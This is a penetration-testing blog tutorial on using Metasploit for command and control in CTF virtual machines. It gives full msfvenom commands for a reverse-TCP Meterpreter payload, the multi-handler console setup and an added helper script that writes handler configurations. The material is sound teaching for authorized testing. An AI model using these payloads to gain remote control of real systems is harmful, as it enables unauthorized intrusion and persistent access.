Metasploit has a ton of functionality related to customizing exploits, but many people use it primarily for its post-exploitation command-and-control (C2) capability. Using Metasploit’s Meterpreter can be really useful for anyone playing one of the many CTF virtual machines on VulnHub.com or a CTF at a conference.
In my most recent webinar—where I demonstrated an attack on a Batman Forever-themed single-player capture the flag (CTF) virtual machine—a live attendee asked about the commands I was using to set up Metasploit as a command-and-control (C2) framework. So, that’s the genesis for this blog.
Read on for a step-by-step walkthrough of how to use Metasploit for command and control, so you can use it in your own CTF experiences or authorized hacking.
Setting up Metasploit for command and control
As an attacker, you usually get your initial access either from phishing or by achieving remote code execution on a target system. In short, you’re able to run a command on a target computer.
For more convenience and capability, you install a C2 agent that brings other useful capabilities to allow you to maintain more persistent control, escalate privileges and potentially execute lateral movement throughout a network.
Metasploit’s Meterpreter is the universal classic C2 agent, packaged with a ton of community-contributed tools. Let’s see how it works.
First, we’ll use the msfvenom command to customize a Meterpreter. We’ll build up a single command line over multiple steps. Only the last msfvenom command shown here will be complete.
In my recent demo-heavy Batman-themed CTF webinar, as in most of my talk demos and training classes, I use a Kali Linux system and set the parameters to make an x86-compatible Linux binary that will “phone home,” or connect back to my Metasploit console. This is the “reverse TCP” mode. So, our msfvenom command will need to specify that we want an x86 Linux-compatible Meterpreter using the “reverse_tcp” method for connecting. That all goes into a single parameter, like so:
msfvenom -p linux/x86/meterpreter/reverse_tcp
Is that it? No, since the Meterpreter hasn’t been told what IP address or TCP port it can connect back to. We set these with two parameters, LHOST and LPORT. The “L” denotes our “local” Metasploit console, in contrast to “R” for remote. To make this easy to follow and test yourself, let’s set LHOST to 127.0.0.1, so you can run this test Meterpreter on the same system as your Metasploit console.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444
Here’s a trick – we can leave out “LPORT,” and let it use the default TCP port: 4444.
We need to set two more parameters. The first is “-f” for “file format.” Msfvenom can make files that run on multiple operating systems and can even make scripts, instead of binaries. We’ll ask for Linux’s standard binary format, the Executable and Linkable Format (ELF), using “-f elf”.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf
Finally, we need to tell msfvenom to write this payload to a file, instead of writing it out to the screen. We use the “-o” parameter to specify an output file path, resulting in the actual usable msfvenom command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf -o meterpreter
After a few seconds, we’ll see that we have a new file called meterpreter.
So, we’ve created a Meterpreter that can connect back to a Metasploit console. Now, we need to start up a Metasploit console and tell it to listen for this Meterpreter. First, we run msfconsole at a command line:
msfconsole
Next, we tell it that we’d like to use the generic payload handler, the “multi-handler” module:
use exploit/multi/handler
We need to tell the multi-handler what payload type is connecting back, using the same value we used in our msfvenom command:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
We need to tell the multi-handler what IP address to listen on – this will correspond to the LHOST value we set in our msfvenom command (LPORT again defaults to 4444, matching the payload):
set LHOST 127.0.0.1
Finally, we run “exploit” to start this module, passing the “-j” option to make this a background job, allowing us to continue running other commands in Metasploit, if we like.
exploit -j
Let’s test this out by starting another shell or terminal window on the same system so we can run the Meterpreter and see it connect back to us. We start a new window, make the Meterpreter executable and run it.
chmod u+x meterpreter
./meterpreter
If you switch back over to your Metasploit console window, you’ll see that you have a Meterpreter session waiting for you. You can interact with it using the sessions command.
sessions -i 1
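The most common way this setup fails in practice is a mismatch between what msfvenom baked into the payload and what the handler is listening for. The following script is an added example, not code from the original post or from the Metasploit project: it takes one set of LHOST/LPORT values, checks them, prints the matching msfvenom command and writes a resource script that msfconsole can load with “msfconsole -r handler.rc”. The payload path and the 4444 default are the ones used above; msfvenom and msfconsole are only assumed to exist when you run the generated output, not by this script.

```shell
#!/bin/sh
# Added example: keep msfvenom and the multi-handler in sync from one
# source of truth. Writes text only; it does not invoke msfvenom itself.

PAYLOAD="linux/x86/meterpreter/reverse_tcp"   # same value as in the walkthrough
DEFAULT_LPORT=4444                            # msfvenom's default when LPORT is omitted

# Accept only a dotted-quad IPv4 address (127.0.0.1 is fine for a local test).
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Accept only a numeric port in 1-65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command for LHOST, LPORT and an output file name.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f elf -o %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

# Write the handler resource script (LHOST, LPORT, output path).
# Fails without writing anything if either value is malformed.
write_handler_rc() {
    lhost="$1"; lport="${2:-$DEFAULT_LPORT}"; out="$3"
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    {
        echo "use exploit/multi/handler"
        echo "set PAYLOAD $PAYLOAD"
        echo "set LHOST $lhost"
        echo "set LPORT $lport"
        echo "exploit -j"
    } > "$out"
}

# Example run for the loopback test described in the post.
venom_cmd 127.0.0.1 "$DEFAULT_LPORT" meterpreter
write_handler_rc 127.0.0.1 "$DEFAULT_LPORT" handler.rc && cat handler.rc
```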
To see all the things that Meterpreter can do, use the help command:
help
Take a look at this list! You can upload and download files, set up port forwarders to proxy traffic through the remote system, and even play music on the remote system’s speakers. There are multi-tasking features to make it easier to run multiple programs and even to control multiple systems from one Metasploit console. It’s very useful!
You can use what you’ve just learned to repeat the attack from the webinar, so please go watch the “Linux Attack and Defense: Batman Edition” webinar. There’s a fun and challenging attack path on this one, filled with a riddle and other bits of throwback humor. You can watch the on-demand webinar, then download the virtual machine to try the attack path yourself. Watch my Twitter @jaybeale or Mastodon (@email@example.com) feeds for the Batman virtual machine download!
Linux Security - Related Resources
Attacking and Defending Linux: Breaking out of the Matrix Edition (webinar with Jay Beale)
Jay Beale, CEO, CTO at InGuardians, Inc.
Jay Beale has created several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the “Stealing the Network” series. He has led training classes on Linux Hardening and other topics at Black Hat, CanSecWest, RSA, and IDG conferences, as well as in private corporate training. Jay is a co-founder, Chief Operating Officer and CTO of the information security consulting company InGuardians.